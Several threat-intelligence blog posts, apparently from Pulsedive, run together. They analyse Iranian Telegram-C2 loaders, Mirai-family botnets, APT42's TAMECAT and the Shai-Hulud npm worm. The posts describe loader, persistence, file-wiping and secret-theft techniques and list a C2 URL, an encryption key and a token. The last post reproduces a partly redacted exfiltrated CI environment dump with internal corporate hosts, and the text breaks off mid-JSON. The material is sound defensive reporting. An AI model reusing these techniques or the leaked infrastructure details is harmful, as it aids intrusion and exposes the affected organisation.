Amid escalating tensions between the US and Iran, Iranian cyber threats are facing increased attention and scrutiny. The Pulsedive research team recently analyzed a series of loader scripts added to Malware Bazaar by Security Researcher @JAMESWT_WT. These scripts caught our attention because they were associated with malware intrusions, in which Telegram was used for Command and Control (C2) - a tactic recently outlined in an FBI FLASH Report. Released on March 20, 2026, the FLASH Report outlined how threat actors aligned with Iran’s Ministry of Intelligence and Security (MOIS) leveraged Telegram as command-and-control infrastructure in cyber operations, using Telegram bots to exfiltrate data from user devices. In this blog, we dive into numerous loader scripts identified as being used in intrusions that leveraged Telegram as the C2. We provide an analysis of the scripts, mitigation recommendations, and a list of observed indicators of compromise. 

Walkthrough of an intrusion

The FBI FLASH report highlights that the intrusions began with social engineering, in which threat actors attempted to convince victims to install malware on their devices. The actors targeted victims via social media applications, posing as technical support or famous personas. The goal of the social engineering campaign was to convince the victim to execute malware on their device. The FBI notes that the malware masquerades as well-known applications. 

Moreover, reports note that the malware used PowerShell to execute malware and modified registry keys to establish persistence. Malware observed in this campaign was capable of recording screen and audio activity, collecting information from the cache, and creating compressed file archives. These archive files were then exfiltrated using Telegram.

Script Analysis

PowerShell Script 1 - ps.ps1

The first sample we will analyze is a simple PowerShell script, available on Malware Bazaar. The script is a one-liner that executes base64 encoded content with the PowerShell window hidden. 

The decoded base64 content indicates that the script is attempting to download additional files and execute them. This script attempts to download two additional files and execute them. At the time of analysis, both files were unavailable.

The script attempts to download files from Vultr Object Storage. The files are downloaded to the temp directory and then executed. The contents of the zip archive are extracted to the path C:\ProgramData\ssh-cache-default\, and the executable RuntimeSSH.exe is executed.

Powershell Script 2 - cmd.ps1

The second sample is almost identical to the first script. The similarity between the scripts is confirmed by the ssdeep value, which only differs by two characters. The only difference is that it specifies "C:\Windows\System32\cmd.exe" before the PowerShell command. 

The ssdeep hashes of script 1 and script 2 confirm that the files are almost identical. The hashes only differ by two characters. 

VBScript 1 - لیست شماره های افراد نیازمند شماره های افراد نیازمند خیلی خدمات شماره های شماره های افراد نیازمند افراد نیازمند به توانبخشی.vbs

Also available on Malware Bazaar is a VBS script that is significantly larger than the PowerShell scripts discussed thus far. The script is a one-liner that executes base64 encoded content with the PowerShell window hidden. 

The file consists of 63791 lines. The bulk of these lines are blank and contain no characters. Once the empty lines of code are removed, we are left with 11 lines of code.

Of those 11 lines, there are two large blobs of text that serve no function. These are the first and last lines of the file. The code executed consists of a string, an array of numbers, a for loop, string-manipulation operations, and a function that executes the manipulated string. 

The first line of the For loop iterates over the array of numbers. The first step is to extract a character from the i-th position of the string in the af789f342e5024051 variable. The next line gets a number from the i-th minus 1 position in the array. From there, the script decodes a character by subtracting the value from step 1 from the value obtained in step 2, then converting the result to a character. This value is then added to an array, which is executed at the end of the loop.

The decoded content reveals that the script attempts to query the disk size. If the disk size exceeds 50 GB, it attempts to execute the PowerShell commands outlined in Scripts 1 and 2. 

The Malware Bazaar collection contains another PowerShell that is similarly inflated at 183,069 bytes. This file contains the same content as the VBS script, as confirmed by the ssdeep values of the files.

Smqdservice.exe

While not the zip archive observed in the scripts we analyzed in our blog, Malware Bazaar contains the payload mentioned in the FBI report. This is a zip archive containing several .pyd files and smqdservice.exe. Sandbox results of the sample are available on Any.Run.

The executable attempts to evade detection by adding exclusions within Microsoft Defender. This is done using PowerShell to exclude the path %ALLUSERSPROFILE%\SMQDServicePackages\ and C:\Users\Power\Downloads\Telegram Desktop

Once the exclusions are in place, the malware executes the smqdservice.exe binary, which loads various Python modules, including python311.dll, which was present in the zip archive. 

The following Telegram bot details were extracted from the binary.

Connecting to the URL specified in the get info parameter provides details about the Telegram bot, including its username, ID, and enabled permissions.

Conclusion

The loaders analyzed in the blog are very basic. Their singular goal is to download additional content that is hosted on Vultr Object Storage. The PowerShell scripts contain base64-encoded content that, once decoded, reveals that the loader attempts to download a zip archive. The zip archive contains a file called RuntimeSSH.exe, which was identified in the FBI FLASH report. The report outlines that this file is used to exfiltrate sensitive information from the compromised device. Telegram is frequently used as C2 infrastructure, as it blends in with legitimate traffic and is relatively easy to create Telegram bots. Moreover, Telegram has served as an online marketplace for cybercrime actors where groups actively advertise malware, exfiltrated data, and services. This makes Telegram a popular tool, allowing threat actors to expand their capabilities without burning through in-house-developed tools. Iranian-affiliated groups like Handela Hack have been active on Telegram, where posts detail their operations.    

Recommendations

Methods to mitigate the risks posed by malware include:

• Deploy EDR/AV solutions: EDR or AV solutions can detect malicious process chains and anomalous activity that may indicate a malware infection.
• Restrict the ability to install applications: Enforce policies that allow users to install only applications from approved sources, such as App Stores. 
• Expand PowerShell logging: Consider enabling script-block logging to ensure security analysts can view the contents of executed scripts.
• Secure PowerShell in Corporate Environments: Organizations can enforce script execution policies that allow only signed scripts to run. Moreover, PowerShell usage should be restricted to users who need to use it.
• User Education: Users can help mitigate the risk of phishing emails and targeted social engineering campaigns. Users should also be wary of unsolicited attachments or senders that pressure them to open attachments or download files. 

Indicators of Compromise

The table below lists network IOCs that have been identified and added to the Pulsedive platform.

MITRE ATT&CK TTPs

The TTPs table uses Tactics and Techniques available in MITRE ATT&CK v19. One of the biggest changes in this version of the framework is that the Defense Evasion tactic has been separated into Stealth (TA0005) and Defense Impairment (TA0112).

References

https://www.ic3.gov/CSA/2026/260320.pdf

https://securityaffairs.com/189820/malware/iran-linked-actors-use-telegram-as-c2-in-malware-attacks-on-dissidents.html 

https://x.com/JAMESWT_WT/status/2036093003664629789    

https://bazaar.abuse.ch/browse/tag/Iran-Linked-Telegram-C2/

Botnets are always an interesting threat to discuss, simply because of their prevalence and the difficulty of restricting and mitigating them. Spamhaus noted that July to December 2025 saw a 24% increase in the number of botnet command & control servers identified when compared to the previous 6-month period. This blog started off as a focused discussion of Aisuru-Kimwolf, what it is, and what has been observed recently; however, since there are so many botnet families that are related to each other, we decided to expand the scope and treat this as more of a technical primer to botnets. This blog will describe observations on several botnets and discuss their key similarities and differences.

What is a Botnet?

Before diving into a discussion about different botnets, let’s establish what a botnet is, fundamentally. A botnet is a network of computers (bots) infected with malicious software and controlled by a single group or actor. These compromised computers can be used to initiate large-scale distributed denial-of-service (DDoS) attacks. Botnets can also be leveraged by attackers to conduct intrusions or phishing campaigns while masking their infrastructure, as they can route commands through the compromised network. 

On March 19, 2026, the U.S. Department of Justice announced disruption actions against IoT botnets. The press release indicated that law enforcement attempted to take down Command and Control infrastructure used by the Aisuru, KimWolf, JackSkid, and Mossad botnets. The disruption actions took place across Canada and Germany. Authorities attempted to seize DigitalOcean droplets (virtual servers) used as C2 servers for KimWolf.

The Akamai graph below illustrates how a brute-force attack using botnets would work. 

Mirai - One of the Most Influential Modern Botnets

Mirai scans the internet for devices that are running on ARC processors. ARC runs a stripped-down version of Linux. Mirai was first identified in 2016 and is used to target vulnerable Internet of Things (IoT) devices. Initial compromise occurs through the exploitation of vulnerabilities on these devices or by using the device's default credentials. 

The Many Different Variants of Mirai

The public availability of Mirai’s source code has led to the creation of many variants. Researchers Ya Liu and Hui Wang released a paper about tracking Mirai variants at Virus Bulletin 2018. In this paper, they outlined different variants based on the samples analyzed. 

The same authors also presented at BotConf in 2023 and outlined that the clustering and classification techniques previously discussed identified 116 different branches from over 21,000 samples.

Satori

Satori is a Mirai-based botnet that was first identified in late 2017. Shortly after its discovery, it infected over 260,000 routers typically used in small-office/home-office environments or in homes. The botnet spreads by exploiting vulnerabilities that typically allow for remote code execution on these devices. One such vulnerability that is abused is an OS command injection vulnerability in D-Link DSL-2750B devices. 

This script is used to download and execute files hosted on a different server on the compromised host. The script first creates a file in each subdirectory of the /tmp/ folder. From there, it creates a file named after the shell interpreter's environmental variable. Then it downloads a file from different URIs before making it executable. Each file is executed. Each file targets a different CPU architecture; the script downloads and executes them all to attempt to compromise as many devices as possible.

The install function in this script is almost identical to the one shown in Figure 15.

Aisuru-Kimwolf

Aisuru-Kimwolf is a botnet used to conduct large-scale DDoS attacks. The Aisuru and Aisuru-Kimwolf variants have compromised approximately 1-4 million hosts globally. Cloudflare notes that Aisuru-Kimwolf is responsible for the largest DDoS attacks to date, including a 31.4 Terabit-per-second attack and a 14.1 billion packet-per-second attack. The botnet can randomize packet characteristics, making it more difficult for security tools to detect attacks. Aisuru encodes a list of C2 IPs in TXT records, associated with the C2 domains. 

Kimwolf

Kimwolf is a botnet that targets Android devices, including Smart TVs and mobile devices. Kimwolf has compromised approximately 2 million devices globally. Kimwolf is considered a subvariant of Aisuru and is an Android-specific variant. Kimwolf uses the DDoS functionality provided by Aisuru, which has been modified to target Android devices. The operators behind Aisuru and Kimwolf have monetized their operations by selling access to the compromised devices to other cybercrime actors. Access to these botnets is sold through services like Discord or Telegram and depends on the attack's size and duration.  

Kimwolf has rapidly infected a large number of devices through residential proxy networks. Residential proxies are networks that route internet tariffs through addresses assigned to homeowners. IPIDEA is a residential proxy that was used by Aisuru and Kimwolf in recent times. Attackers used IPIDEA nodes to mask their activity. In an attempt to disrupt residential proxy abuse, Google took action to take down C2 domains and domain advertising IPIDEA products. Following the announcement of the takedown, there were reports that Kimwolf has switched to leveraging The Invisible Project. The Invisible Project is a decentralized, encryption communications network designed to anonymize and secure communication. The move to I2P can be an attempt to evade takedown attempts. 

KimWolf Script Analysis

The first part of the script attempts to download various files from an adversary-controlled server. These files include .apk files; for downloaded files, the script attempts to execute them before starting services.

Conclusion

Botnet activity has surged over the last year, with Spauhaus noting 26% and 24% increases in the two six-month periods Jan - Jun 2025 and Jul - Dec 2025, respectively. This increase is associated with bots and nodes appearing in the United States, as shown in Figure 2. The increase in activity from the US is substantial enough to have overtaken China as the country with the most botnet C&C servers, a rank China has held since the third quarter of 2023. The increase also stems from the availability of source code for botnets such as Mirai. Mirai offshoots and variants are responsible for some of the largest DDoS attacks by volume. Since these botnets exploit vulnerabilities in home routers, it can be expected that there will always be a threat, as these devices are seldom patched.  

Recommendations

The impact of botnets can be mitigated using solutions such as:

• DDoS Protection: Network providers often offer solutions to detect and proactively block bot activity.
• Protective DNS: Protective DNS solutions can filter DNS requests and identify suspicious activity.
• Patch Edge Devices: Ensure that, at a minimum, any publicly accessible network devices are patched regularly.
• Rotate Default Credentials: Ensure that the default credentials for networking devices are not being used. These should be changed during device setup.

Indicators of Compromise

The table below lists a subset of the Aisuru-Kimwolf network IOCs that have been identified and added to the Pulsedive platform. This data can be queried in Pulsedive using the Explore query threat=Aisuru-Kimwolf and is available for export in multiple formats (CSV, STIX 2.1, JSON).

References

https://www.justice.gov/usao-ak/pr/authorities-disrupt-worlds-largest-iot-ddos-botnets-responsible-record-breaking-attacks 

https://www.justice.gov/usao-ak/pr/authorities-disrupt-worlds-largest-iot-ddos-botnets-responsible-record-breaking-attacks 

https://www.spamhaus.org/resource-hub/botnet-c-c/botnet-threat-update-july-to-december-2025/ 

https://blog.cloudflare.com/ddos-threat-report-2025-q4/ 

https://www.justice.gov/archives/opa/press-release/file/1017566/dl

https://www.akamai.com/glossary/what-is-a-botnet

https://ismg-cdn.nyc3.cdn.digitaloceanspaces.com/asset_files/external/akd-26134-applicationandaffidavit-march162026.pdf 

https://krebsonsecurity.com/2026/01/the-kimwolf-botnet-is-stalking-your-local-network/ 

https://cloud.google.com/blog/topics/threat-intelligence/disrupting-largest-residential-proxy-network 

https://www.cloudflare.com/learning/ddos/glossary/aisuru-kimwolf-botnet/ 

https://krebsonsecurity.com/2026/02/kimwolf-botnet-swamps-anonymity-network-i2p/

https://www.virusbulletin.com/virusbulletin/2018/12/vb2018-paper-tracking-mirai-variants/

https://www.botconf.eu/botconf-presentation-or-article/how-many-mirai-variants-are-there/

https://pulsedive.com/threat/Satori

https://www.exploit-db.com/exploits/44760

https://www.radware.com/security/ddos-threats-attacks/threat-advisories-attack-reports/satori-iot-botnet/

https://blog.lumen.com/the-resilient-satori-botnet/ 

https://research.google/pubs/understanding-the-mirai-botnet/

https://synthient.com/blog/a-broken-system-fueling-botnets

https://www.usenix.org/system/files/conference/usenixsecurity17/sec17-antonakakis.pdf

TAMECAT is a PowerShell-based malware that can execute various commands to collect sensitive information. Reporting from the Israel National Digital Agency dives into the modular nature of the TAMECAT and its functionality. The malware is used by APT42, an Iranian state-sponsored cyber-espionage actor, during its espionage operations. Reporting from Israel indicates that TAMECAT was observed being deployed in espionage campaigns targeting high-value senior defense and government officials. The group leverages social engineering to build rapport with victims over an extended period before gaining access to their environments. This blog will outline TAMECAT’s capabilities and how it exfiltrates data. 

This overview includes:

• Malware Analysis
• Recommendations
• Indicators of Compromise
• MITRE ATT&CK TTPs

Israel’s National Digital Agency shared a breakdown of the in-memory modules available with TAMECAT. This included the ability to extract data from Microsoft Edge using remote debugging, screen captures, and suspending Chrome for data collection. 

In the analysis, the researchers noted that the malware received commands from a Telegram bot. The malware used messages from the bot to download additional scripts. 

Malware Analysis

The intrusion sample that we analyze in this blog starts with a VBScript script that downloads TAMECAT’s first stage. This script checks which antivirus products are running on the system. This check determines whether the script uses conhost and PowerShell or cmd.exe and curl to download the second stage. The sample used in this analysis is available on VirusTotal.

When the VBScript file is executed, it uses WMI to retrieve a list of installed antivirus products on the host. The returned list is then used to determine which scripting interpreter is used to download the second stage. If the antivirus list contains “indows”, the VBScript uses conhost to launch PowerShell. The PowerShell script uses wget to download the loader TAMECAT (081419a484bbf99f278ce636d445b9d8). Once the file is downloaded, the script is executed using PowerShell. The script uses an obfuscated command to execute the downloaded PowerShell Script. 

This obfuscated command decodes as the following:

If the antivirus list does not contain Windows, then the VBScript uses cmd.exe and curl to download another piece of malware. At the time of analysis, the link was down, so the payload could not be analyzed.

Nconf.txt (TAMECAT PowerShell Loader)

This is the TAMECAT loader that was hosted on tebi[.]io. This script contains several variables containing arrays of values, as well as two functions. The functions are used to decode data and execute additional code. The sample is available on Triage and VirusTotal. 

The Gorba function defines two parameters called $te12 and $k12ey. The values of these parameters are defined at the end of the script and are shown in the table below.

The value stored in the $k12ey parameters is the same one identified by Volexity in a variant of PowerStar. The Yara rule shared by Volexity closely matches the commands observed in this analysis. 

From there, the script attempts to download the next stage of TAMECAT from a base64-encoded URL. The PowerShell script uses a hardcoded user-agent within the network traffic. The script uses the downstring command to retrieve text from tebi[.]io. The URL is base64-encoded in the script, and before it is decoded, the script drops the first 3 bytes of the encoded string. The file attempts to download text within a file called df32s.txt, which holds base64-encoded content.

The script base64-decodes the file's contents and then performs the following actions on each byte:

• Perform a bitwise not on each bit and convert to base2 
• Convert to a string and extract 8 characters starting from the 24th character
• Convert to Byte

Once this manipulation is complete, the script converts the bytes to a UTF-8-Encoded string.

The decoded content reveals an additional function that is executed with the value stored in $te12. This function defines an AES decryptor used to decrypt the value stored in $te12 after it is base64-decoded.

This decoded string is passed to the Borjol function.

This decrypted data contains functions that manipulate data in the following ways.

The PowerShell script uses these functions to manipulate data while attempting to exfiltrate it. The script writes an alphanumeric string, which Google believes to be a victim identifier to %LocalAppData%\config.txt.

The script then creates a new directory called Chrome in %LocalAppData%. From there, the script defines the SessionUrl, the hostname used for network communication. The value for this parameter is a hxxps://accurate-sprout-porpoise[.]glitch[.]me, which was defined as a global parameter in the function Borjol.

From there, the script collects details about the operating system, including:

• OS
• ComputerName
• Token (GILNH9LX6TCZ9V8ZZSUF) - the value specified in the $configtxt parameter.

This data is then passed to the Borpos function for encryption before being exfiltrated via a POST request to the domain hxxps://accurate-sprout-porpoise[.]glitch[.]me. The key is the value kNz0CXiP0wEQnhZXYbvraigXvRVYHk1B, while the initialization vector is created using the xs function. The script also adds the header Content-DPR, which stores the IV value.

The malware then waits for the C2’s response. If the status code is not 400 and the response is not empty, then the script calls the Borjoly function to decode the response from the C2. The data is separated by ¶ and contains the following four values:

• language
• Command
• ThreadName
• StartStop

The command is in base64-encoded format. Google identified that the $Language parameter will be used to execute either PowerShell or C# code, and the $StartStop will be used to download additional content, execute, or terminate a command. 

Conclusion

TAMECAT is a PowerShell-based malware used by APT42 during its espionage campaigns. It has gone through several iterations, with different variants sharing several similarities. These similarities include the use of Base64-Encoded strings within arrays, the use of array fragments to generate code, and PowerShell string replacement and wildcards. The developers behind TAMECAT have also been observed using platforms such as Discord and Telegram as C2 channels. 

Recommendations

Methods to mitigate the risks posed by malware, such as TAMECAT, include:

• Deploy EDR/AV solutions: EDR or AV solutions can detect malicious process chains and anomalous activity that may indicate a malware infection.
• Monitor for wscript launching other scripting interpreters: VBS scripting launching PowerShell or cmd.exe is often suspicious.
• Expand PowerShell logging: Consider enabling script-block logging to ensure security analysts can see the contents of scripts that were executed.
• Secure PowerShell in Corporate Environments: Organizations can enforce script execution policies that allow only signed scripts to run. Moreover, PowerShell usage should be restricted to users who need to use it.
• User Education: Users can help mitigate the risk of phishing emails and targeted social engineering campaigns. Users should also be wary of unsolicited attachments or senders that pressure them to open attachments or download files.

Indicators of Compromise

The table below lists TAMECAT network IOCsthat have been identified and added to the Pulsedive platform. This data can be queried in Pulsedive using the Explore query threat=TAMECAT and is available for export in multiple formats (CSV, STIX 2.1, JSON).

MITRE ATT&CK TTPs

References

https://govextra.gov.il/national-digital-agency/cyber/research/spearspecter/

https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations 

https://apt.etda.or.th/cgi-bin/listgroups.cgi?t=TAMECAT&n=1 

https://attack.mitre.org/software/S1193/ 

https://www.virustotal.com/gui/file/5404e39f2f175a0fc993513ee52be3679a64c69c79e32caa656fbb7645965422/details 

https://tria.ge/240814-t493jsscke/static1

https://www.virustotal.com/gui/file/bd1f0fb085c486e97d82b6e8acb3977497c59c3ac79f973f96c395e7f0ca97f8/detection

https://github.com/volexity/threat-intel/blob/main/2023/2023-06-28%20POWERSTAR/indicators/rules.yar

https://www.cyber.gov.au/sites/default/files/2025-03/Securing%20PowerShell%20in%20the%20enterprise%20%28October%202021%29.pdf

On November 24, 2025, multiple security vendors reported a new Shai-Hulud campaign that compromised several popular npm packages. The compromised packages include those from Zapier, ENS Domains, PostHog, and Postman. Researchers from Wiz identified that the earliest evidence of malicious npm packages being added to npm is from around 03:00 UTC on November 24th, 2025. The compromise results in a GitHub repository containing stolen information. GitHub has been removing repositories; however, as of 15:00 EST on November 25, 2025, some remain accessible.

This blog will walk through the malicious code present in the second iteration of the Shai-Hulud compromise. 

How Does the Compromise Work?

The malicious versions of the NPM packages contained two files called setup_bun.js and bun_environment.js. These were made to look like the package was introducing the Bun runtime, which is a JavaScript runtime environment, package manager, and test runner. According to researchers at HelixGuard, the setup_bun.js file contains code that masquerades as Bun setup code and invokes the bun_environment.js file.

The bun_environment.js file is an obfuscated JavaScript file, around 10 MB in size, that contains code for collecting secrets and exfiltrating information.

The malicious code attempts to add workflows to the infected machines. One such workflow is .github/workflows/discussion.yaml, which executes commands by opening a discussion in the GitHub repo.

The malicious code collects information about the system and collects secrets from AWS, GCP, and Azure.

The collected content is double base64-encoded before being added to the public GitHub repo. Reporting from socket.dev states that the exfiltrated content was triple base64-encoded and that some repositories also contained a file called actionSecrets.json. This file was not present in the repositories we reviewed, but scanners for Sha1-Hulud reference it.

Propagation is similar to that seen in the first campaign. Once the worm identifies a valid NPM token, it fetches the maintainer’s package (limited to 100 packages) and updates each package using the updatePackage() function.

The updatePackage() function adds the setup_bun.js and bun_environment.js files to the package, updates the package.json file to add the preinstall script, and increments the patch version before publishing the compromised version.

Socket.dev also reported on the destructive capabilities of the worm. If the worm cannot find a GitHub token or an NPM token, it attempts to delete files. For Windows environments, the worm uses cmd.exe to delete all files in %USERPROFILE% (the current user’s profile directory) and overwrites the free space using the cipher /w command. This command overwrites deleted data in a drive's free space, making it unrecoverable.

In Linux or macOS environments, the worm finds all of a user’s writable files and overwrites them with the shred command before deleting the empty directories.

Scope of Compromise

The worm creates a GitHub repository with the description Sha1-Hulud: The Second Coming. These repositories contain exfiltrated data. As of 19:45 EST on November 24, 2025, approximately 22,600 GitHub repositories had the description Sha1-Hulud: The Second Coming.

Each of these repositories contain .json files with base64-encoded data. The files included in the repository are:

• cloud.json
• contents.json
• environment.json

Some repositories also had a file called truffleSecrets.json.

Exfiltrated Information

cloud.json

The cloud.json file contains any secrets extracted from AWS, GCP, and Azure. The content is double base64-encoded, and the decoded text is a JSON object.

contents.json

The contents.json file contains information about the system, including operating system, architecture, user details, and GitHub account details. The content is double base64-encoded, and the decoded text is a JSON object.

environment.json

The environment.json file contains build information. The content is double base64-encoded, and the decoded text is a JSON object.

{
  "environment": {
    "SHELL": "/bin/bash",
    "npm_command": "install",
    "REPOSOLNS_HELM_RELEASE_REPO": "https://helm.ci.artifacts.walmart.com/artifactory/ret-marketplace-helm-prod-local",
    "LOOPER_TARGET_BRANCH": "AGAction",
    "TASK_LOG_SIZE_LIMIT": "500000000",
    "LOOPER_SCM_OWNER_ID": "RET-Marketplace",
    "ak_Password": "<redacted>",
    "npm_package_dev_optional": "",
    "npm_config_loglevel": "verbose",
    "GITHUB_BRANCH_SHORT_DESC": "GitHub branch AGAction: Branch build",
    "no_proxy": ".us.wal-mart.com,localhost,127.0.0.1,dev.walmart.com,cdn.cocoapods.org,*-keystone-endpoint.prod.walmart.com,cdn.jsdelivr.net,slack.com,*.blob.core.windows.net,mockDeliveryUrl,ondemand.saucelabs.com,jira.walmart.com*.prod.us.walmart.net,*.googleapis.com,euclid.azurecr.io,*xmatters.com,sandbox-cluboperations-claims.azurewebsites.net,accounts.google.com,usgta*.wal-mart.com,metadata.google.*,cloud.google.com,ossindex.sonatype.org,*.azure-api.net,*dev-transpo-fresh-pullforward-aggregator.azurewebsites.net/actuator/health,*samsclub.riversand.com*,sb.scorecardresearch.com,i.imgur.com,kafka-local-landoop,mock-server,vault,postgresql,active-mq,phonehome.hazelcast.com,*.azurewebsites.net,login.microsoftonline.com,dc.services.visualstudio.com,marketplace.walmartapis.com,*.saucelabs.com,blob.core.windows.net,file.appcenter.ms,testburst.walmart.com,tnest.walmart.com,gcr.io",
    "ALLOW_NUGET_PUSH_TO_AF": "true",
    "TRACK": "walmartUS",
    "RUN_TESTS_DISPLAY_URL": "https://runner-1-2175078775.<redacted>pro-prod-runner02.prod-ndc23.prod.walmart.com/job/Feature-MultiBranch-PWT/job/AGAction/22/display/redirect?page=tests",
    "REPOSOLNS_GENERIC_REPO": "https://generic.ci.artifacts.walmart.com/artifactory/ret-marketplace-generic",
    "REPOSOLNS_PYPI_REPO": "https://pypi.ci.artifacts.walmart.com/artifactory/api/pypi/ret-marketplace-pypi",
    "LOOPER_SLAVE": "<redacted>pro-prod-agent110-17",
    "GITHUB_REPO_GIT_URL": "git://gecgithub01.walmart.com/RET-Marketplace/mp-coee-pwt.git",
    "REPOSOLNS_PYPI_RELEASE_REPO": "https://pypi.ci.artifacts.walmart.com/artifactory/api/pypi/ret-marketplace-pypi-prod-local",
    "npm_package_integrity": "sha512-8tLdJQAFOYmmAkXI5ADBsNz+qbB4HbkKcPSREn3Fl11SAH9ogM6j7qd7q4XUp4lY/Re47PXEN3XJKXDKOivIDg==",
    "server": "runner-1-2175078775.<redacted>pro-prod-runner02.prod-ndc23.prod.walmart.com",
    "REPOSOLNS_NPM_BASEURL": "https://npm.ci.artifacts.walmart.com/artifactory/api/npm",
    "NPM_CONFIG_CACHE": "/mnt/<redacted>/workspace/Feature-MultiBranch-PWT/AGAction/.npm",
    "NODE": "/mnt/<redacted>/workspace/Feature-MultiBranch-PWT/AGAction/tools/nix_64/nodejs-22.1.0/bin/node",
    "JENKINS_SERVER_COOKIE": "cad2bf9e97974601",
    "JAVA_HOME": "/mnt/<redacted>/workspace/Feature-MultiBranch-PWT/AGAction/tools/nix_64/jdk-1.8.0_161-b12",
    "GITHUB_REPO_SSH_URL": "git@gecgithub01.walmart.com:RET-Marketplace/mp-coee-pwt.git",
    "Timeout": "360000",
    "NODE_EXTRA_CA_CERTS": "/mnt/<redacted>/workspace/Feature-MultiBranch-PWT/AGAction/tools/nix_64/provenance-0.44.0/var/work/proxy-cacerts.pem",
    "REPOSOLNS_SBT_SNAPSHOT_REPO": "https://sbt.ci.artifacts.walmart.com/artifactory/ret-marketplace-sbt-snapshots-local",
    "TRIGGER_TARGET_BRANCH": "AGAction",
    "PROVENANCE_CACERT_PEM": "/mnt/<redacted>/workspace/Feature-MultiBranch-PWT/AGAction/tools/nix_64/provenance-0.44.0/var/work/proxy-cacerts.pem",
    "PROXIMITY_MVN_RELEASE": "https://repository.walmart.com/content/groups/public/",
    "RUN_CHANGES_DISPLAY_URL": "https://runner-1-2175078775.<redacted>pro-prod-runner02.prod-ndc23.prod.walmart.com/job/Feature-MultiBranch-PWT/job/AGAction/22/display/redirect?page=changes",
    "COLOR": "0",
    "npm_config_local_prefix": "/mnt/<redacted>/workspace/Feature-MultiBranch-PWT/AGAction/ws",
    "LOOPER_EXECUTOR": "0",
    "REPOSOLNS_NPM_SNAPSHOT_REPO": "https://npm.ci.artifacts.walmart.com/artifactory/api/npm/ret-marketplace-npm",
    "PROVENANCE_HOSTNAME": "agent-17-2154463403.<redacted>pro-prod-agent110.edc02.prod.walmart.com",
    "NPM_CONFIG_REGISTRY": "https://npm.ci.artifacts.walmart.com/artifactory/api/npm/ret-marketplace-npm/",
    "npm_config_globalconfig": "/mnt/<redacted>/workspace/Feature-MultiBranch-PWT/AGAction/tools/nix_64/nodejs-22.1.0/globalconfig",
    "REPOSOLNS_MVN_REPO": "https://mvn.ci.artifacts.walmart.com/artifactory/ret-marketplace-mvn",
    "REPOSOLNS_DOCKER_REPONAME": "ret-marketplace-docker",
    "EDITOR": "vi",
    "REPOSOLNS_MVN_SNAPSHOT_REPO": "https://mvn.ci.artifacts.walmart.com/artifactory/ret-marketplace-mvn-snapshots-local",
    "ENV": "qa",
    "MART_UPPER": "",
    "HUDSON_HOME": "/<redacted>/<redacted>-workspace",
    "PWD": "/mnt/<redacted>/workspace/Feature-MultiBranch-PWT/AGAction/ws/node_modules/@postman/tunnel-agent",
    "LOGNAME": "<redacted>",
    "NODEJS_HOME": "/mnt/<redacted>/workspace/Feature-MultiBranch-PWT/AGAction/tools/nix_64/nodejs-22.1.0",
    "GIT_SSL_CAINFO1": "/mnt/<redacted>/workspace/Feature-MultiBranch-PWT/AGAction/tools/nix_64/provenance-0.44.0/var/work/proxy-cacerts.pem",
    "PROXIMITY_MVN_SNAPSHOT": "https://repository.walmart.com/content/groups/public_snapshots/",
    "BUILD_URL": "https://runner-1-2175078775.<redacted>pro-prod-runner02.prod-ndc23.prod.walmart.com/job/Feature-MultiBranch-PWT/job/AGAction/22/",
    "SLACK_CHANNEL": "",
    "ALLOW_NPM_PUSH_TO_AF": "true",
    "PROVENANCE_HOME": "/mnt/<redacted>/workspace/Feature-MultiBranch-PWT/AGAction/tools/nix_64/provenance-0.44.0",
    "NPM_HOME": "/mnt/<redacted>/workspace/Feature-MultiBranch-PWT/AGAction/tools/nix_64/npm-10.7.0",
    "GITHUB_BRANCH_URL": "https://gecgithub01.walmart.com/RET-Marketplace/mp-coee-pwt",
    "REPOSOLNS_DOCKER_SNAPSHOT_REPONAME": "ret-marketplace-docker-snapshots-local",
    "JOB_URL": "https://runner-1-2175078775.<redacted>pro-prod-runner02.prod-ndc23.prod.walmart.com/job/Feature-MultiBranch-PWT/job/AGAction/",
    "npm_package_dev": "",
    "npm_config_init_module": "/mnt/<redacted>/.npm-init.js",
    "BUILD_NUMBER": "22",
    "SYSTEMD_EXEC_PID": "2414440",
    "GIT_COMMITTER_NAME": "SVC-ciad-prod1",
    "ALLOW_ARTIFACTORY": "true",
    "LOOPER_AGENT_LABELS": "ASSEMBLY-<redacted>pro-prod-agent110, CLOUD-prod-edc02, docker-daemon, linux, <redacted>pro-prod-agent110, <redacted>pro-prod-agent110-17",
    "_": "/mnt/<redacted>/workspace/Feature-MultiBranch-PWT/AGAction/tools/nix_64/nodejs-22.1.0/bin/node",
    "PROXIMITY_MVN_REPO": "https://repository.walmart.com/content/groups/public",
    "REPOSOLNS_SBT_REPO": "https://sbt.ci.artifacts.walmart.com/artifactory/ret-marketplace-sbt",
    "REPOSOLNS_PYPI_SNAPSHOT_REPO": "https://pypi.ci.artifacts.walmart.com/artifactory/api/pypi/ret-marketplace-pypi-snapshots-local",
    "LOOPER_AGENT": "<redacted>pro-prod-agent110-17",
    "MAIL_TO": "",
    "BUILD_DISPLAY_NAME": "#22",
    "HOME": "/mnt/<redacted>",
    "npm_package_peer": "",
    "LANG": "en-US",
    "REPOSOLNS_SBT_RELEASE_REPO": "https://sbt.ci.artifacts.walmart.com/artifactory/ret-marketplace-sbt-prod-local",
    "WORKDIR": "/mnt/<redacted>/workspace/Feature-MultiBranch-PWT/AGAction/ws",
    "DataProvider": "false",
    "TRIM_TASK_LOG": "false",
    "TRIGGER_BRANCH": "AGAction",
    "npm_package_version": "0.6.7",
    "LOOPER_SLAVE_LABELS": "ASSEMBLY-<redacted>pro-prod-agent110, CLOUD-prod-edc02, docker-daemon, linux, <redacted>pro-prod-agent110, <redacted>pro-prod-agent110-17",
    "REPOSOLNS_VIRTUAL_DEFAULT_DEPLOYMENT": "-prod-local",
    "REPOSOLNS_DOCKER_RELEASE_REPONAME": "ret-marketplace-docker-prod-local",
    "LOOPER_TRIGGER": "USER",
    "REPOSOLNS_NPM_RELEASE_REPO": "https://npm.ci.artifacts.walmart.com/artifactory/api/npm/ret-marketplace-npm-prod-local",
    "SEND_SLACK": "false",
    "REPOSOLNS_FQDN_CI": "ci.artifacts.walmart.com",
    "npm_config_proxy": "http://10.167.213.150:43754",
    "JENKINS_URL": "https://runner-1-2175078775.<redacted>pro-prod-runner02.prod-ndc23.prod.walmart.com/",
    "npm_package_resolved": "https://npm.ci.artifacts.walmart.com:443/artifactory/api/npm/ret-marketplace-npm/@postman/tunnel-agent/-/tunnel-agent-0.6.7.tgz",
    "JOB_BASE_NAME": "AGAction",
    "GITHUB_BRANCH_CAUSE_SKIP": "false",
